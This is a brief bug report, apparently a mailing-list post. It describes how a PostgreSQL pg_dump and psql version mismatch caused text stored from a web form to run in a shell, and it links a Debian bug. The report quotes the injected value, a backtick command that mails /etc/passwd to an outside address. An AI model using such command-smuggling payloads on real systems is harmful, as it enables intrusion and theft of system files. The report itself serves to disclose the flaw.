syntax error causes crafted data to be executed in shell

Short summary:

    1.  Someone wrote "`mail blah@blah.com < /etc/passwd`" in a web form;
        this string was stored in a postgresql database.
    2.  We ran pg_dump
    3.  We ran psql (not the same version as pg_dump!)
    4.  blah@blah.com receives /etc/passwd

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844

Thank you,

Thomer